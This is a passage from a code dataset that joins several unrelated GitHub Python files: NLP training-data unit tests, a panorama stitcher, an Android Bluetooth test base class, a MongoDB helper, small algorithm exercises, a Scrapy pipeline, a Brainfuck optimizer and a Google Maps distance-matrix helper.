and\n test_object.x_train == None and\n test_object.x_test == None and\n test_object.y_train == None and\n test_object.y_test == None and\n isinstance(test_object.corpus_df, type(pd.DataFrame()))\n )\n\n @unittest.mock.patch('os.walk')\n def test_collect_files_from_dir(self, mock_walk):\n\n mock_walk.return_value = [(\"foo\", \"bar\", [\"Training.test\"]), (\"foo\", \"bar\", [\"Training.txt\"])]\n mock = unittest.mock.Mock()\n mock.folder = \"\"\n mock.file_ending = \".test\"\n mock.DataFrame = pd.DataFrame()\n output = utils.TrainingData.collect_files_from_dir(mock)\n self.assertTrue(list(output[\"file_path\"]) == [\"foo/Training.test\"])\n\n def test_add_categories(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.corpus_df = pd.DataFrame({\"file_path\": [\"foo/a/Training.test\",\n \"foo/b/Training.test\",\n \"foo/b/Training.test\",\n \"foo/c/Training.test\"]})\n\n output = utils.TrainingData.add_categories(mock_obj)\n self.assertTrue(list(output[\"Categories\"] == [\"a\", \"b\", \"b\", \"c\"]))\n\n @unittest.mock.patch(\"lib.utils.read_save\")\n def test_add_text(self, mock_read_save):\n\n mock_read_save.return_value = \"Das ist ein Test\"\n mock_read_save.nlp = (\"Das\", \"ist\", \"ein\", \"Test\")\n mock_obj = unittest.mock.Mock()\n mock_obj.lang = \"de\"\n mock_obj.corpus_df = pd.DataFrame({\"file_path\": [\"foo/a/Training.test\",\n \"foo/b/Training.test\"]})\n output = utils.TrainingData.add_text(mock_obj)\n self.assertTrue(list(output[\"text\"]) == [\"Das ist ein Test\", 
\"Das ist ein Test\"])\n\n def test_to_sentences(self):\n\n mock_obj = unittest.mock.Mock()\n a = collections.namedtuple(\"doc\",\"sents\")\n b = a(sents=[[\"Das\", \"ist\", \"ein\", \"Test\", \".\"], [\"Das\", \"auch\", \".\"]])\n\n\n mock_obj.corpus_df = pd.DataFrame({\"tokens\": [b]})\n\n output = utils.TrainingData.to_sentences(mock_obj)\n self.assertTrue(list(output[\"sentences\"]) == [[[\"Das\", \"ist\", \"ein\", \"Test\", \".\"], [\"Das\", \"auch\", \".\"]]])\n\n def test_to_chunks(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.chunk_scope = \"test\"\n mock_obj.chunk_size = 2\n mock_obj.corpus_df = pd.DataFrame({\"test\": [[None] * 6]})\n\n output = utils.TrainingData.to_chunks(mock_obj)\n self.assertTrue(list(output[\"test_chunks\"]) == [[[None, None], [None, None], [None, None]]])\n\n def test_to_chars(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.corpus_df = pd.DataFrame({\"text\": [\"test\", \"tset\"]})\n output = utils.TrainingData.to_chars(mock_obj)\n self.assertTrue(list(output[\"characters\"]) == [[\"t\", \"e\", \"s\", \"t\"], [\"t\", \"s\", \"e\", \"t\"]])\n\n def test_to_ngrams(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.scope = \"test\"\n mock_obj.gram_size = 3\n mock_obj.corpus_df = pd.DataFrame({\"test\": [[\"t\", \"e\", \"s\", \"t\"], [\"t\", \"s\", \"e\", \"t\"]]})\n output = utils.TrainingData.to_ngrams(mock_obj)\n self.assertTrue(list(output[\"test_ngrams\"]) == [[(\"t\", \"e\", \"s\"), (\"e\", \"s\", \"t\")],\n [(\"t\", \"s\", \"e\"), (\"s\", \"e\", \"t\")]])\n\n def test_generate_one_hot_matrix(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.scope = \"test\"\n mock_obj.num_words = 3\n mock_obj.corpus_df = pd.DataFrame({\"test\": [\"Ein Test\"]})\n\n output = utils.TrainingData.generate_one_hot_matrix(mock_obj)\n self.assertTrue(list(output[\"one_hot\"][0].flatten()) == [0., 1., 0., 0., 0., 0., 0., 0., 0., 0.,\n 0., 0., 0., 0., 1., 0., 1., 0., 0., 0.,\n 0., 0., 0., 1.])\n\n def test_generate_sequences(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.sequence_scope = \"test\"\n mock_obj.num_words = 5\n\n mock_obj2 = unittest.mock.Mock()\n mock_obj2.text = \"Ein Text\"\n\n mock_obj.corpus_df = pd.DataFrame({\"test\": [[mock_obj2]]})\n\n output = utils.TrainingData.generate_sequences(mock_obj)\n self.assertTrue(list(output[\"sequences\"]) == [[[1, 2]]])\n\n def test_padding_sequences(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.maxlen = 8\n mock_obj.corpus_df = pd.DataFrame({\"sequences\": [[[1, 3, 4, 4, 1, 2],\n [1, 3, 4, 2, 1, 2]]]})\n output = utils.TrainingData.padding_sequences(mock_obj)\n self.assertTrue(list(output[\"sequences\"][0].flatten()) == [1, 3, 4, 4, 1, 2, 0, 0, 1, 3, 4, 2, 1, 2, 0, 0])\n\n def test_to_categorical_trainingdata(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.categorical_scope = \"test\"\n mock_obj.corpus_df = pd.DataFrame({\"test\": [[1, 1, 4], [2, 4, 3], [3, 4, 5], [4, 6, 7]],\n \"Categories\": [\"a\", \"b\", \"a\", \"b\"]})\n\n x, y = utils.TrainingData.to_categorical_trainingdata(mock_obj)\n\n self.assertTrue(list(x) == [1, 1, 4, 2, 4, 3, 3, 4, 5, 4, 6, 7] and\n list(y) == [0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1])\n\n def test_split_training_data(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.X = [[0], [0], [1], [1]]\n mock_obj.Y = [[1], [1], [2], [2]]\n mock_obj.ratio = 0.25\n x_train, x_test, y_train, y_test = utils.TrainingData.split_training_data(mock_obj)\n\n self.assertTrue(len(x_train) == 3 and\n len(x_test) == 1 and\n len(y_train) == 3 and\n len(y_test) == 1)\n\n 
@unittest.mock.patch(\"lib.utils.read_save\")\n def test_load_sequential_data(self, mock_read_save):\n\n mock_read_save.return_value = \"Das\\t0\\nist\\t0\\nein\\t1\\nTest\\t1\\n\"\n\n mock_obj = unittest.mock.Mock()\n mock_obj.corpus_df = pd.DataFrame({\"file_path\": [\"foo/a/Training.test\",\n \"foo/b/Training.test\"]})\n output = utils.TrainingData.load_sequential_data(mock_obj)\n\n self.assertTrue(output[\"text\"][0] == [\"Das\", \"ist\", \"ein\", \"Test\"] and\n output[\"sequence_label\"][1] == ['0', '0', '1', '1'])\n\n @unittest.mock.patch(\"lib.utils.context_grabber\")\n def test_add_sequential_context(self, mock_context_grabber):\n\n mock_context_grabber.return_value = ['padder padder padder a b c padder',\n 'padder padder a b c padder padder',\n 'padder a b c padder padder padder']\n\n mock_obj = unittest.mock.Mock()\n mock_obj.corpus_df = pd.DataFrame({\"text\": [\"test\"]})\n\n\n output = utils.TrainingData.add_sequential_context(mock_obj)\n self.assertTrue(output[\"sequence_training\"][0] == ['padder padder padder a b c padder',\n 'padder padder a b c padder padder',\n 'padder a b c padder padder padder'])\n\n @unittest.mock.patch(\"lib.utils.fill_parameters\")\n @unittest.mock.patch(\"lib.utils.single_run_paramsearch\")\n def test_td_paramsearch(self, mock_single_run_paramsearch, mock_fill_parameters):\n\n mock_single_run_paramsearch.return_value = {\"score\": 1}\n\n mock_fill_parameters.return_value = {\"chunk_scope\": [\"test\"], \"num_words\": [3], \"file_ending\": [\"txt\"],\n \"folder\": [\"test\"],\n \"windowsize\": [4, 8], \"ratio\": [0.1], \"maxlen\": [6], \"gram_size\": [3],\n \"chunk_size\": [0], \"lang\": [\"de\"], \"sequence_scope\": [\"test\"],\n \"categorical_scope\": [\"test\"]}\n\n output = utils.td_paramsearch([], [], [])\n self.assertTrue(any(output == [{'score': 1}, {'score': 1}]))\n\n @unittest.mock.patch(\"lib.utils.TrainingData\")\n def test_single_run_paramsearch(self, mock_init):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.x_train = [0]\n\n mock_init.return_value = mock_obj\n\n mock_obj2 = unittest.mock.Mock()\n mock_obj2.score = lambda x, y: 1\n mock_obj2.fit = lambda x, y: 1\n\n output = utils.single_run_paramsearch([], [mock_obj2], [], [], [], [], [], [], [], [], [], [], [], [])\n self.assertTrue(set(output[0].keys()) == set(['maxlen', 'lang', 'ratio', 'file_ending', 'classifier',\n 'chunk_size',\n 'score', 'num_words', 'sequence_scope', 'categorical_scope',\n 'chunk_scope', 'folder', 'windowsize', 'gram_size']))\n\n\n\n\n\n\n","repo_name":"LeKonArD/TfDPy","sub_path":"testing/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":11417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18858184395","text":"import json\nimport os\n\nimport cv2\nimport numpy as np\n\nfrom blend import ImageInfo, blendImages\nfrom feature import get_mapping\nfrom warp import warp_spherical\n\n\ndef load_images(dirpath):\n \"\"\"\n Load images from the dirpath\n :param dirpath containing a series of images\n :return: list of cv2 images\n \"\"\"\n if not dirpath:\n return\n files = sorted(os.listdir(dirpath))\n files = [\n f for f in files\n if f.endswith('.jpg') or f.endswith('.png') or f.endswith('.ppm')\n ]\n images = [cv2.imread(os.path.join(dirpath, i)) for i in files]\n print('Load {0} images successfully!'.format(len(images)))\n return images\n\n\ndef warp_images(images, f=595, k1=-0.15, k2=0.0):\n \"\"\"\n warp images to spherical coordinates.\n :return: warpped images list\n 
\"\"\"\n return [\n warp_spherical(img, f, k1, k2) for img in images\n ]\n\n\nimgs = load_images('panorama')\nwarpped = warp_images(imgs)\n\n\nt = np.eye(3)\ninfo = []\nT = []\nfor i in range(len(warpped)-1):\n print('Computing mapping from {0} to {1}'.format(i, i+1))\n info.append(ImageInfo('', warpped[i], np.linalg.inv(t)))\n tmp = get_mapping(warpped[i], warpped[i+1])\n print(tmp)\n t = tmp.dot(t)\n T.append(tmp)\n\ninfo.append(ImageInfo('', warpped[len(warpped)-1], np.linalg.inv(t)))\nprint('Computing mapping from {0} to {1}'.format(len(warpped)-1, 0))\ntmp = get_mapping(warpped[len(warpped)-1], warpped[0])\nprint(tmp)\nt = tmp.dot(t)\ninfo.append(ImageInfo('', warpped[0], np.linalg.inv(t)))\n\n# json.dump(T, fp=open('transform_output.json','w'), indent=4)\nprint('Blending Images.')\npanorama = blendImages(info, blendWidth=50, is360=True)\ncv2.imwrite('Panorama.jpg', panorama)\n","repo_name":"3288103265/ImgStitching","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73407022239","text":"import os\nimport time\nimport traceback\nfrom acts import utils\nfrom acts.base_test import BaseTestClass\nfrom acts.signals import TestSignal\nfrom acts.utils import set_location_service\nfrom acts.controllers import android_device\nfrom acts.test_utils.bt.bt_test_utils import (\n reset_bluetooth, setup_multiple_devices_for_bt_test, take_btsnoop_logs)\nfrom acts.utils import sync_device_time\nimport threading\n\n\nclass BluetoothBaseTest(BaseTestClass):\n DEFAULT_TIMEOUT = 10\n start_time = 0\n timer_list = []\n\n def __init__(self, controllers):\n BaseTestClass.__init__(self, controllers)\n\n # Use for logging in the test cases to facilitate\n # faster log lookup and reduce ambiguity in logging.\n @staticmethod\n def bt_test_wrap(fn):\n def _safe_wrap_test_case(self, *args, **kwargs):\n test_id = \"{}:{}:{}\".format(self.__class__.__name__, fn.__name__,\n time.time())\n log_string = \"[Test ID] {}\".format(test_id)\n self.log.info(log_string)\n try:\n for ad in self.android_devices:\n ad.droid.logI(\"Started \" + log_string)\n result = fn(self, *args, **kwargs)\n for ad in self.android_devices:\n ad.droid.logI(\"Finished \" + log_string)\n if result is not True and \"bt_auto_rerun\" in self.user_params:\n self.teardown_test()\n log_string = \"[Rerun Test ID] {}. 
1st run failed.\".format(\n test_id)\n self.log.info(log_string)\n self.setup_test()\n for ad in self.android_devices:\n ad.droid.logI(\"Rerun Started \" + log_string)\n result = fn(self, *args, **kwargs)\n if result is True:\n self.log.info(\"Rerun passed.\")\n elif result is False:\n self.log.info(\"Rerun failed.\")\n else:\n # In the event that we have a non-bool or null\n # retval, we want to clearly distinguish this in the\n # logs from an explicit failure, though the test will\n # still be considered a failure for reporting purposes.\n self.log.info(\"Rerun indeterminate.\")\n result = False\n return result\n except TestSignal:\n raise\n except Exception as e:\n self.log.error(traceback.format_exc())\n self.log.error(str(e))\n return False\n return fn(self, *args, **kwargs)\n\n return _safe_wrap_test_case\n\n def _reboot_device(self, ad):\n self.log.info(\"Rebooting device {}.\".format(ad.serial))\n ad = ad.reboot()\n\n def setup_class(self):\n if \"reboot_between_test_class\" in self.user_params:\n threads = []\n for a in self.android_devices:\n thread = threading.Thread(\n target=self._reboot_device, args=([a]))\n threads.append(thread)\n thread.start()\n for t in threads:\n t.join()\n for a in self.android_devices:\n set_location_service(a, False)\n sync_device_time(a)\n return setup_multiple_devices_for_bt_test(self.android_devices)\n\n def setup_test(self):\n self.timer_list = []\n for a in self.android_devices:\n a.ed.clear_all_events()\n return True\n\n def teardown_test(self):\n return True\n\n def on_fail(self, test_name, begin_time):\n self.log.debug(\n \"Test {} failed. Gathering bugreport and btsnoop logs\".format(\n test_name))\n take_btsnoop_logs(self.android_devices, self, test_name)\n self._take_bug_report(test_name, begin_time)\n for _ in range(5):\n if reset_bluetooth(self.android_devices):\n break\n else:\n self.log.error(\"Failed to reset Bluetooth... 
retrying.\")\n return\n\n def _take_bug_report(self, test_name, begin_time):\n if \"no_bug_report_on_fail\" in self.user_params:\n return\n\n # magical sleep to ensure the runtime restart or reboot begins\n time.sleep(1)\n for ad in self.android_devices:\n try:\n ad.adb.wait_for_device()\n ad.take_bug_report(test_name, begin_time)\n tombstone_path = os.path.join(\n ad.log_path, \"BugReports\",\n \"{},{}\".format(begin_time, ad.serial).replace(' ', '_'))\n utils.create_dir(tombstone_path)\n ad.adb.pull('/data/tombstones/', tombstone_path)\n except:\n self.log.error(\"Failed to take a bug report for {}, {}\"\n .format(ad.serial, test_name))\n\n def _get_time_in_milliseconds(self):\n return int(round(time.time() * 1000))\n\n def start_timer(self):\n self.start_time = self._get_time_in_milliseconds()\n\n def end_timer(self):\n total_time = self._get_time_in_milliseconds() - self.start_time\n self.timer_list.append(total_time)\n self.start_time = 0\n return total_time\n\n def log_stats(self):\n if self.timer_list:\n self.log.info(\"Overall list {}\".format(self.timer_list))\n self.log.info(\"Average of list {}\".format(\n sum(self.timer_list) / float(len(self.timer_list))))\n self.log.info(\"Maximum of list {}\".format(max(self.timer_list)))\n self.log.info(\"Minimum of list {}\".format(min(self.timer_list)))\n self.log.info(\"Total items in list {}\".format(len(\n self.timer_list)))\n self.timer_list = []\n","repo_name":"IHNEL/AOSP_RK3128_Full","sub_path":"rk3128/tools/test/connectivity/acts/framework/acts/test_utils/bt/BluetoothBaseTest.py","file_name":"BluetoothBaseTest.py","file_ext":"py","file_size_in_byte":5875,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"4473616571","text":"import datetime as dt\n\nimport pymongo\nfrom bson.codec_options import CodecOptions\n\nfrom . 
import constants, settings\nfrom .caching import cache\n\nSORT_KEY = [\n (\"blockNumber\", pymongo.ASCENDING),\n (\"transactionIndex\", pymongo.ASCENDING),\n (\"logIndex\", pymongo.ASCENDING),\n]\n\n\nclient = pymongo.MongoClient(settings.DATABASE_URL)\ndb = client.get_database()\n\n\ndef create_indices():\n db.events.create_index(\"event\")\n db.events.create_index(\"address\")\n\n db.events.create_index(SORT_KEY, unique=True)\n\n for key in [\"minter\", \"redeemer\", \"borrower\"]:\n db.events.create_index(f\"returnValues.{key}\")\n\n db.dsr.create_index(\"blockNumber\", unique=True)\n\n db.ds_values.create_index(\"blockNumber\", unique=True)\n db.ds_values.create_index(\"address\")\n\n db.chi_values.create_index(\"blockNumber\", unique=True)\n\n db.blocks.create_index(\"blockNumber\", unique=True)\n\n db.prices.create_index(\"blockNumber\", unique=True)\n\n\ndef iterate_events():\n return db.events.find().sort(SORT_KEY)\n\n\ndef count_events():\n return db.events.count_documents({})\n\n\n@cache(constants.DAY)\ndef get_block_dates():\n projection = {\"_id\": False, \"blockNumber\": True, \"timestamp\": True}\n return {\n b[\"blockNumber\"]: dt.datetime.fromtimestamp(\n int(b[\"timestamp\"]), dt.timezone.utc\n )\n for b in db.blocks.find(projection=projection)\n }\n\n\ndef prices():\n options = CodecOptions(tz_aware=True)\n return db.get_collection(\"prices\", codec_options=options)\n","repo_name":"merofinance/analyzer","sub_path":"backd/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"51"} +{"seq_id":"33276974369","text":"class Solution:\n def intersect(self, nums1: list[int], nums2: list[int]) -> list[int]:\n \"\"\"\n >>> Solution().intersect([1,2,2,1], [2,2])\n [2, 2]\n \"\"\"\n res = []\n dont = set()\n for each in nums1:\n n2c = nums2.count(each)\n if(each not in dont and n2c>0):\n res = res + [each]*min(n2c, nums1.count(each))\n dont.add(each)\n return res\n \n\n \n \n\n \nif __name__ == \"__main__\":\n import doctest\n doctest.testmod(verbose=True)","repo_name":"Evan-Bell/leetcode","sub_path":"python3/350. Intersection of Two Arrays II.py","file_name":"350. 
Intersection of Two Arrays II.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39609366261","text":"# https://swexpertacademy.com/main/code/problem/problemDetail.do?contestProbId=AV189xUaI8UCFAZN\n\nimport sys\nsys.stdin = open(\"SW Expert Academy/220720/1284_input.txt\", \"r\")\n\nT = int(input())\nfor test_case in range(1, T + 1):\n P, Q, R, S, W = map(int, input().split())\n \n # A사\n result_a = W * P\n # B사\n result_b = 0\n if W <= R:\n result_b = Q\n else:\n result_b = Q + (W - R) * S\n\n if result_a >= result_b:\n print(f'#{test_case} {result_b}')\n else:\n print(f'#{test_case} {result_a}')\n","repo_name":"snnzzoo/Python-Practice","sub_path":"SW Expert Academy/220720/1284_수도요금경쟁.py","file_name":"1284_수도요금경쟁.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24002196123","text":"from parser_bf import *\n\n\"\"\"\nNOTE: \n The 3rd optimization: Increments/decrements at a fixed offset\n is automatically dealt with in my implementation of Postponing Movements\n\n The 5th optimization: Assignments Cancellation\n are also automatically dealt with thanks to my code architecture\n\n The 7th optimization: Copy/multiply loop simplification\n for this, in our code architecture, we can only have increment instructions in the loop\n\n\"\"\"\n\n# --------------------------------------------------------------------\n# Macros\n# --------------------------------------------------------------------\n\nclass Macros:\n \"\"\" class of macros used in the compiler \"\"\"\n all_ops = [BFIncrement, BFPointer]\n input_output = [BFInput, BFPrint]\n\n# --------------------------------------------------------------------\n# Optimizer Class\n# --------------------------------------------------------------------\n\nclass Optimizer:\n \"\"\" Optimizes the brainfuck instrs \"\"\"\n\n def __init__(self, block: BFBlock) -> None:\n self.__block : BFBlock = block\n self.__block_instr : List(BFInstruction) = block.block\n self.__instr_len : int = len(self.__block_instr)\n self.__incr_counter : int = None\n self.__ptr_counter : int = None\n self.__optimize()\n\n block : BFBlock = property(lambda self : self.__block)\n block_instr : List[BFInstruction] = property(lambda self : self.__block_instr)\n\n def __clean(self, instr_set : List[BFInstruction]) -> BFBlock:\n \"\"\" Removes dead instr with 0 value \"\"\"\n new_instr = list()\n for instr in instr_set:\n if type(instr) in Macros.all_ops: # look for dead instr\n if instr.value != 0:\n new_instr.append(instr)\n\n elif isinstance(instr, BFLoop): # iterate through BFLoop instructions\n if len(instr.body.block) > 0:\n new_instr.append(BFLoop(self.__clean(instr.body.block), instr.id))\n\n else: # append all other instructions\n new_instr.append(instr)\n\n return BFBlock(new_instr)\n\n def __reverse(self, instr_set : List[BFInstruction]) -> None:\n \"\"\" Reverses Increment and Pointer instr so that incr happens before ptr movement \"\"\"\n for index, instr in enumerate(instr_set):\n # if a pointer then check for switching\n if isinstance(instr, BFPointer):\n if index+1 < len(instr_set):\n next_instr = instr_set[index+1]\n # if next instr is incr then switch\n if isinstance(next_instr, BFIncrement):\n # print(\"reversed\")\n instr_set[index], instr_set[index+1] = next_instr, instr\n if isinstance(instr, BFLoop):\n # print(\"reached loop\")\n 
self.__reverse(instr.body.block)\n\n # --------------------------------------------------------------------\n # Optimizations\n # --------------------------------------------------------------------\n\n def __optimize(self) -> None:\n \"\"\" Runs all optimizations \"\"\"\n # run contraction optimizations\n self.__opt_add_sub(self.__block_instr)\n # clean null instr\n self.__block = self.__clean(self.__block_instr)\n self.__block_instr = self.__block.block\n print(\"Contraction performed\")\n \n # run postpone optimizations\n self.__opt_postpone(self.__block_instr)\n # clean null instr\n self.__block = self.__clean(self.__block_instr)\n self.__block_instr = self.__block.block\n # reverse ptr and incr instr\n self.__reverse(self.__block_instr)\n print(\"Postponing performed\")\n\n # run scan loop simplification\n self.__opt_scan_loop(self.__block_instr)\n # exit(0)\n print(\"Scan inf loop performed\")\n\n # run copy loop simplification\n unused = self.__opt_loop(self.__block_instr)\n if unused: print(\"This is a loopless simplifiable program\")\n print(\"Simplifiable loop checked\\n\")\n\n def optimize_two(self) -> None:\n # run postpone optimizations\n self.__opt_postpone(self.__block_instr)\n # clean null instr\n self.__block = self.__clean(self.__block_instr)\n self.__block_instr = self.__block.block\n # reverse ptr and incr instr\n self.__reverse(self.__block_instr)\n\n # --------------------------------------------------------------------\n # Contraction optimizations\n\n def __opt_add_sub(self, instr_set: List[BFInstruction]) -> None:\n \"\"\" Contracts incr/decr instr \"\"\"\n instr_len = len(instr_set)\n index = 0\n\n while index < instr_len: # run through all instructions\n instr = instr_set[index]\n\n if isinstance(instr, BFIncrement): # update arith_ops\n # set the counter to initial value\n self.__incr_counter = instr.value\n while index+1 < instr_len: # iterate until end of list\n next_instr = instr_set[index+1]\n # if next instr not arith_op break\n if not isinstance(next_instr, BFIncrement):\n break\n # nullify the value of the current instr\n instr.change_val(0)\n # add the value of the next instruction\n # and reset the curr instr to next\n self.__incr_counter += next_instr.value\n instr = next_instr\n index += 1\n instr.change_val(self.__incr_counter)\n\n elif isinstance(instr, BFPointer): # update ptr_ops\n # set the counter to initial value\n self.__ptr_counter = instr.value\n while index+1 < instr_len: # iterate until end of list\n next_instr = instr_set[index+1]\n # if next instr not arith_op break\n if not isinstance(next_instr, BFPointer):\n break\n # nullify the value of the current instr\n instr.change_val(0)\n # add the value of the next instruction\n # and reset the curr instr to next\n self.__ptr_counter += next_instr.value\n instr = next_instr\n index += 1\n instr.change_val(self.__ptr_counter)\n\n elif isinstance(instr, BFLoop): # iterate through loop instr\n self.__opt_add_sub(instr.body.block)\n \n index += 1\n\n # --------------------------------------------------------------------\n # Postponing Movement\n\n def __opt_postpone(self, instr_set: List[BFInstruction]) -> None:\n \"\"\" Optimizations for movement postponing \"\"\"\n instr_len = len(instr_set)\n index = 0\n\n while index < instr_len: # iterate through all instr\n instr = instr_set[index]\n\n if isinstance(instr, BFPointer):\n last_ptr_instr = instr\n # set the ptr value\n self.__ptr_counter = instr.value\n while index+1 < instr_len:\n next_instr = instr_set[index+1]\n # if next instr not an incr 
or ptr then break\n if not type(next_instr) in Macros.all_ops:\n break\n if isinstance(next_instr, BFPointer):\n assert(isinstance(instr, BFIncrement)), f\"Instrs {instr, next_instr} not contracted!\"\n # update local ptr val\n self.__ptr_counter += next_instr.value\n # update last ptr as the latest ptr\n last_ptr_instr = next_instr\n elif isinstance(next_instr, BFIncrement):\n assert(isinstance(instr, BFPointer)), f\"Instrs {instr, next_instr} not contracted!\"\n # change dest ptr val for the incr instr\n next_instr.change_ptr(self.__ptr_counter)\n # reset ptr val for curr ptr\n instr.change_val(0)\n instr = next_instr\n index += 1\n last_ptr_instr.change_val(self.__ptr_counter)\n\n elif isinstance(instr, BFLoop): # iterate through loop instr\n # print(instr.body.block)\n # exit(0)\n self.__opt_postpone(instr.body.block)\n\n index += 1\n\n # --------------------------------------------------------------------\n # Scan loop simplification\n # TODO can be merged into opt_postpone\n\n def __opt_scan_loop(self, instr_set: List[BFInstruction]) -> None:\n \"\"\" Checks loops for potential inf loops modifies linear scanning \"\"\"\n for instr in instr_set:\n if isinstance(instr, BFLoop):\n loop_instr = instr.body.block\n if len(loop_instr) == 1:\n if isinstance(loop_instr[0], BFPointer) and abs(loop_instr[0].value) == 1:\n print(loop_instr[0].value)\n print(instr.id)\n instr.set_inf()\n else:\n self.__opt_scan_loop(loop_instr)\n\n # --------------------------------------------------------------------\n # Copy/multiply loop simplification\n # TODO can be merged into opt_postpone\n\n def __opt_loop(self, instr_set : List[BFInstruction]) -> bool:\n \"\"\" Checks if single assignment can be performed in the loop \"\"\"\n simplifiable = True\n self.__incr_counter = 0\n\n assert(len(instr_set)>0), f\"Instr {instr_set} should have been cleaned before\"\n if not (isinstance(instr_set[0], BFIncrement) \\\n and (instr_set[0].ptr, instr_set[0].value) == (0, -1)):\n simplifiable = False\n\n for instr in instr_set:\n if isinstance(instr, BFLoop):\n simplifiable = self.__opt_loop(instr.body.block)\n # if simplifiable:\n # print(instr.body)\n # print(simplifiable)\n instr.set_simplifiable(simplifiable)\n simplifiable = False # current loop is not simplifiable\n\n # In a simplifiable loop, ptr instr would have been removed before\n elif not isinstance(instr, BFIncrement):\n simplifiable = False\n\n return simplifiable\n\n\nif __name__ == \"__main__\":\n if len(sys.argv)-1 != 1:\n print(f'Usage: {sys.argv[0]} [FILE.bf]', file = sys.stderr)\n exit(1)\n\n program = parse_program(sys.argv[1])\n print(f\"program before opt: {program}\\n\")\n optimizer = Optimizer(program)\n print(f\"1st opt: {optimizer.block}\\n\")\n optimizer.optimize_two()\n print(f\"2nd opt: {optimizer.block}\\n\")\n\n BFExit\n","repo_name":"vrushank-agrawal/CSE302","sub_path":"lab6/optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":10929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35513491600","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nfrom omim.items import OmimItem\n\n\nclass OmimPipeline(object):\n\n def open_spider(self, spider):\n self.header = 'prefix location gene genename gene_mim phenotype pheno_mim inheritance pheno_map_key pmids hgnc_symbol'.split()\n self.file = 
open(spider.outfile, 'w')\n        self.file.write('\\t'.join(self.header) + '\\n')\n\n    def close_spider(self, spider):\n        self.file.close()\n        spider.logger.info('\\033[32msave file: {}\\033[0m'.format(spider.outfile))\n\n    def process_item(self, item, spider):\n        if isinstance(item, OmimItem):\n            line = '\\t'.join('{%s}' % each for each in self.header)\n            line = line.format(**dict(item))\n            self.file.write(line + '\\n')\n        return item\n","repo_name":"suqingdong/MySpider","sub_path":"scrapy_project/omim/omim/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17662242680","text":"import googlemaps as gm\nimport json\nimport sys\nimport requests\nimport numpy as np\nimport urllib.parse\nfrom itertools import tee\nfrom geopandas import GeoDataFrame\n\n# Example of usage of the googlemaps API\ndef teste_gm(gmaps, times, n, origins, destinations):\n\tmode = \"driving\"\n\tunits = \"metric\"\n\tprint(len(origins), len(destinations))\n\tfor i in range(n):\n\t\tfor j in range(n):\n\t\t\tprint(i,j,times[i][j],end=\": \")\n\t\t\tresult = gmaps.distance_matrix(origins=origins[i],destinations=destinations[j], \n\t\t\t\tmode=mode, units=units)\n\t\t\tprint(result[\"rows\"][0][\"elements\"][0][\"duration\"][\"value\"])\n\n# Makes a travel time request on a partition of the data matrix\ndef make_req_gm(gmaps, indexes, times,from_,to_):\n\tmode = \"driving\"\n\tunits = \"metric\"\n\tresult = gmaps.distance_matrix(from_, to_, mode=mode, units=units)\n\tn = len(to_)\n\tfor i in range(len(indexes)):\n\t\tfor j in range(n):\n\t\t\ttimes[indexes[i]][j] = result[\"rows\"][i][\"elements\"][j][\"duration\"][\"value\"]\n\n\n# Recursively partitions the data matrix so the googlemaps API can handle it\ndef rec(gmaps, indexes, times, from_, to_):\n\tif len(to_) > 100:\n\t\traise ValueError()\n\telif len(from_)*len(to_) > 100:\n\t\tn = len(from_)\n\t\trec(gmaps, indexes[:n//2], times, from_[:n//2], to_)\n\t\trec(gmaps, indexes[n//2:], times, from_[n//2:], to_)\n\telse:\n\t\tmake_req_gm(gmaps, indexes, times,from_,to_)\n\n\n# Read a list of lat longs from the input file path and calls the recursive algorithm to\n# get the travel times\ndef get_googlemaps(path):\n\n\tgmaps = gm.Client(key=GG_KEY)\n\n\tarq = open(path,\"r\")\n\tn = int(arq.readline())\n\torigins = []\n\tdestinations = []\n\tfor line in arq.readlines():\n\t\tlat, longi = [float(x) for x in line.split()]\n\t\torigins.append((lat,longi))\n\t\tdestinations.append((lat,longi))\n\tarq.close()\n\n\ttimes = []\n\tfor i in range(n):\n\t\ttimes.append([0]*n)\n\trec(gmaps,range(n),times,origins,destinations)\n\treturn n,times\n\ndef gen_distance_matrix(origins, destinations):\n\t'''\n\t\tUse google maps' API to fetch distance matrix between origin and destination (lists of lat-long)\n\t'''\n\tif len(origins) != len(destinations):\n\t\traise ValueError()\n\t\n\tgmaps = gm.Client(key=GG_KEY)\n\n\ttimes = [] #numpy???\n\tfor i in range(n):\n\t\ttimes.append([0]*n)\n\trec(gmaps, range(n), times, origins, destinations)\n\n\treturn n, 